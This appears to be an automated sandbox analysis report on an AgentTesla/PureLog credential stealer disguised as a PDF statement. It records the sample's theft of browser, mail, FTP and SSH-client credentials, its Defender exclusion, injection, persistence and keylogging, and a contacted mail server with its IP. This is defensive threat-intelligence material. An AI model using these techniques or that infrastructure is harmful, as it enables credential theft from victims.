                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 1988, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 7384, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7512, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7928, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7176, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7364, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.000000000323C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 1988, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 7384, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7512, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7928, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7176, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7364, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.5260000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.5260000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2071533656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2075260613.0000000005260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		22
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432007 Sample: SOA FOR APR 2024 PDF.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 61 mail.fascia-arch.com 2->61 63 api.ipify.org 2->63 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Sigma detected: Scheduled temp file as task from temp location 2->73 75 12 other signatures 2->75 8 SOA FOR APR 2024 PDF.exe 7 2->8         started        12 eeBIYZL.exe 5 2->12         started        14 BjTxJte.exe 2->14         started        16 BjTxJte.exe 2->16         started        signatures3 process4 file5 57 C:\Users\user\AppData\Roaming\eeBIYZL.exe, PE32 8->57 dropped 59 C:\Users\user\AppData\Local\...\tmpCB26.tmp, XML 8->59 dropped 91 Adds a directory exclusion to Windows Defender 8->91 93 Injects a PE file into a foreign processes 8->93 18 SOA FOR APR 2024 PDF.exe 16 5 8->18         started        23 powershell.exe 23 8->23         started        35 2 other processes 8->35 95 Multi AV Scanner detection for dropped file 12->95 97 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->97 99 Machine Learning detection for dropped file 12->99 25 eeBIYZL.exe 12->25         started        27 schtasks.exe 12->27         started        29 BjTxJte.exe 14->29         started        37 2 other processes 14->37 31 BjTxJte.exe 16->31         started        33 schtasks.exe 16->33         started        signatures6 process7 dnsIp8 65 mail.fascia-arch.com 50.87.195.61, 49711, 49713, 49722 UNIFIEDLAYER-AS-1US United States 18->65 67 api.ipify.org 104.26.12.205, 443, 49708, 49712 CLOUDFLARENETUS United States 18->67 53 C:\Users\user\AppData\Roaming\...\BjTxJte.exe, PE32 18->53 dropped 55 C:\Users\user\...\BjTxJte.exe:Zone.Identifier, ASCII 18->55 dropped 77 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->77 79 Tries to steal Mail credentials (via file / registry access) 18->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->81 83 Loading BitLocker PowerShell Module 23->83 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        43 conhost.exe 27->43         started        85 Tries to harvest and steal ftp login credentials 31->85 87 Tries to harvest and steal browser information (history, passwords, etc) 31->87 89 Installs a global keyboard hook 31->89 45 conhost.exe 33->45         started        47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        51 conhost.exe 37->51         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SOA FOR APR 2024 PDF.exe45%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SOA FOR APR 2024 PDF.exe52%VirustotalBrowse
                    SOA FOR APR 2024 PDF.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\eeBIYZL.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe45%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe52%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\eeBIYZL.exe45%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    C:\Users\user\AppData\Roaming\eeBIYZL.exe52%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.fascia-arch.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://r3.i.lencr.org/00%URL Reputationsafe
                    http://mail.fascia-arch.com0%Avira URL Cloudsafe
                    http://x1.c60%Avira URL Cloudsafe
                    http://mail.fascia-arch.com0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high
                      mail.fascia-arch.com
                      		50.87.195.61
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://r3.o.lencr.org0SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3358769112.0000000008990000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001751000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.ipify.orgSOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://mail.fascia-arch.comSOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.000000000323C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://x1.c6eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://account.dyn.com/SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, eeBIYZL.exe, 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.ipify.org/tSOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSOA FOR APR 2024 PDF.exe, 00000000.00000002.2070759087.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070759087.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000A.00000002.2129650041.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2226704866.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2226704866.000000000311F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2310538046.0000000002919000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2310538046.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://x1.c.lencr.org/0SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3322622943.00000000066A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
